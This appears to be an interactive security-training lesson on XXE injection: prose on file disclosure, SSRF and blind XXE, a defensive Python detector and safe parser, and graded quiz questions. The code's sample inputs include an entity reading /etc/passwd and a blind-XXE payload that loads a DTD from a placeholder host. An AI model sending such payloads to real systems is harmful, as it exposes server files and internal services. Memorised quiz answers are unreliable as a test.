Loopus

XXE Injection

25 min · lab · +60 XP

Learning Objectives

  • Understand XML External Entity injection
  • Learn to exploit XXE for file disclosure
  • Master blind XXE techniques

XXE Injection

XML External Entity (XXE) injection exploits XML parsers that process external entity references. This vulnerability can lead to file disclosure, SSRF, denial of service, and in some cases remote code execution.

Understanding XML Entities

XML allows a document to define entities, which are essentially named variables that the parser expands wherever they are referenced. External entities reference content from files or URLs and are declared with the SYSTEM keyword.

Basic XXE Exploitation

File Disclosure

Define an external entity pointing to a local file such as /etc/passwd, then reference that entity in the document content. When the parser expands the entity, it reads the file and substitutes its contents into the parsed document.

SSRF via XXE

External entities can also reference HTTP URLs, so the server's own parser can be made to issue requests to internal services that the server can reach.

Blind XXE

When the parsed output is not displayed back to the client, out-of-band techniques are used instead. The document references an external DTD hosted on an attacker-controlled server, and that DTD defines entities which exfiltrate data through HTTP or DNS requests.

Finding XXE Vulnerabilities

Look for XML processing in API endpoints accepting XML, file upload features (DOCX, XLSX, SVG), SAML authentication, RSS/Atom feed processors, and SOAP web services.

Prevention

Secure XML parsing requires disabling external entities in XML parsers, using JSON instead of XML when possible, validating and sanitizing XML input, and updating XML libraries regularly.
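As an added example (not part of the Loopus lesson), the following Python code illustrates the "Finding XXE Vulnerabilities" and "Prevention" points above from the defender's side: a pre-parse triage function that flags documents carrying a DTD or an external (SYSTEM/PUBLIC) entity reference, including the parameter entities used for blind XXE, and a parse routine that refuses any DOCTYPE and disables external entity resolution in Python's standard-library xml.sax parser. The sample documents are constructed, and the dtd.example host is a placeholder.

```python
import io
import re
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes

# A DOCTYPE means a DTD is present. An ENTITY or DOCTYPE declaration using
# SYSTEM/PUBLIC pulls content from a file or URL, which is the XXE primitive.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")
EXTERNAL_RE = re.compile(rb"<!(?:ENTITY|DOCTYPE)\b[^>\[]*\b(?:SYSTEM|PUBLIC)\b")


def classify(xml_bytes: bytes) -> str:
    """Triage before parsing: 'external-entity' (file/URL reference, including
    the parameter entities used for blind XXE), 'dtd' (internal subset only)
    or 'clean' (no DTD at all). This is the value to log or alert on."""
    if EXTERNAL_RE.search(xml_bytes):
        return "external-entity"
    if DOCTYPE_RE.search(xml_bytes):
        return "dtd"
    return "clean"


class _TextCollector(xml.sax.ContentHandler):
    def __init__(self):
        super().__init__()
        self.parts = []  # character data the parser actually produced

    def characters(self, content):
        self.parts.append(content)


def safe_parse(xml_bytes: bytes):
    """Return the document's character data, or None when it is rejected."""
    if DOCTYPE_RE.search(xml_bytes):
        return None  # refuse any DTD outright rather than trying to sanitise it
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


# Constructed sample inputs, not captured traffic.
CLEAN_DOC = b'<?xml version="1.0"?><user><name>alice</name></user>'
INTERNAL_DTD_DOC = b'<!DOCTYPE user [<!ENTITY co "Example Ltd">]><user>&co;</user>'
XXE_FILE_DOC = b'<!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><user>&xxe;</user>'
BLIND_XXE_DOC = b'<!DOCTYPE user [<!ENTITY % dtd SYSTEM "http://dtd.example/x.dtd"> %dtd;]><user/>'
```

Refusing every DOCTYPE is simpler and safer than trying to allow-list "harmless" entity declarations; the classify result is what belongs in the application log when a document is rejected.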

Answer the Questions

Question 1 (Knowledge): What vulnerability abuses XML parsers?
Format: *** (3 chars), exact match required

Question 2 (Hands-On): What XML element declares external entities?
Format: ****** (6 chars), exact match required

Question 3 (Knowledge): What type of entity retrieves data out of band?
Format: ***** (5 chars), exact match required

Question 4 (Hands-On): What keyword defines an external entity source?
Format: ****** (6 chars), exact match required